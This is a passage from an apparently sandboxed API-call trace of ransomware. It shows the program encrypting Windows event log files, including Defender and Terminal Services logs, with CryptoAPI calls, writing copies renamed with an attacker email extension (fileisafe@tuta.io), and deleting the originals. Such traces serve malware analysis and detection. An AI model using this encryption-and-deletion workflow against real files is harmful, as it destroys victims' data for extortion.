(hKey=0xf71e40) returned 1 [0065.913] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0065.913] CryptDestroyKey (hKey=0xf71b00) returned 1 [0065.913] CloseHandle (hObject=0x2e4) returned 1 [0065.913] CloseHandle (hObject=0x30c) returned 1 [0065.915] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx")) returned 1 [0065.916] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0065.917] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.917] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0065.917] CloseHandle (hObject=0x30c) returned 1 [0065.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 0x20 [0065.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0065.917] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0065.917] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.917] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0065.917] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0065.917] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c40) returned 1 [0065.917] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0065.917] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0065.976] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0065.976] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.097] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0066.097] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.097] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0066.097] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0066.097] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0066.098] CryptDestroyKey (hKey=0xf71c40) returned 1 [0066.098] CloseHandle (hObject=0x30c) returned 1 [0066.098] CloseHandle (hObject=0x2e4) returned 1 [0066.100] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx")) returned 1 [0066.108] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.108] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.109] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.109] CloseHandle (hObject=0x320) returned 1 [0066.109] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 0x20 [0066.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.118] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0066.118] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.118] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.118] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.124] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf720c0) returned 1 [0066.124] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.124] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.129] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.129] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.131] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c80) returned 1 [0066.131] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.131] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0066.131] CryptDestroyKey (hKey=0xf71c80) returned 1 [0066.131] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0066.131] CryptDestroyKey (hKey=0xf720c0) returned 1 [0066.131] CloseHandle (hObject=0x30c) returned 1 [0066.131] CloseHandle (hObject=0x320) returned 1 [0066.133] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 1 [0066.135] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.135] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.135] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.135] CloseHandle (hObject=0x320) returned 1 [0066.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 0x20 [0066.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.135] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.135] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.135] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.135] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0066.136] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72040) returned 1 [0066.136] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.136] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.146] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.146] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.149] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72140) returned 1 [0066.149] CryptSetKeyParam (hKey=0xf72140, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.149] CryptEncrypt (in: hKey=0xf72140, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0, dwBufLen=0xc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0) returned 1 [0066.149] CryptDestroyKey (hKey=0xf72140) returned 1 [0066.149] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x172, lpOverlapped=0x0) returned 1 [0066.149] CryptDestroyKey (hKey=0xf72040) returned 1 [0066.149] CloseHandle (hObject=0x320) returned 1 [0066.149] CloseHandle (hObject=0x30c) returned 1 [0066.151] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx")) returned 1 [0066.153] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.153] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.155] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.155] CloseHandle (hObject=0x320) returned 1 [0066.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 0x20 [0066.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.156] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0066.156] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.156] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.156] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.161] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71bc0) returned 1 [0066.161] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.161] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.163] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.163] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.165] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e00) returned 1 [0066.165] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.165] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0, dwBufLen=0xc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xc0) returned 1 [0066.165] CryptDestroyKey (hKey=0xf71e00) returned 1 [0066.165] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x172, lpOverlapped=0x0) returned 1 [0066.165] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0066.165] CloseHandle (hObject=0x24c) returned 1 [0066.165] CloseHandle (hObject=0x320) returned 1 [0066.167] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 1 [0066.168] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.169] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0066.169] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.169] CloseHandle (hObject=0x320) returned 1 [0066.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 0x20 [0066.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.351] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.351] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.351] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.351] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.351] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71e00) returned 1 [0066.351] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.351] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.353] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.353] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0066.355] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b00) returned 1 [0066.355] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.355] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0066.355] CryptDestroyKey (hKey=0xf71b00) returned 1 [0066.355] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0066.355] CryptDestroyKey (hKey=0xf71e00) returned 1 [0066.355] CloseHandle (hObject=0x338) returned 1 [0066.355] CloseHandle (hObject=0x324) returned 1 [0066.357] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx")) returned 1 [0066.359] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0066.359] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.359] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0066.359] CloseHandle (hObject=0x324) returned 1 [0066.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx")) returned 0x20 [0066.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0066.359] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0066.359] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.359] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0066.360] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-windows defender%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0066.360] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71c80) returned 1 [0066.360] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0066.360] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0066.362] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0066.362] WriteFile (in: 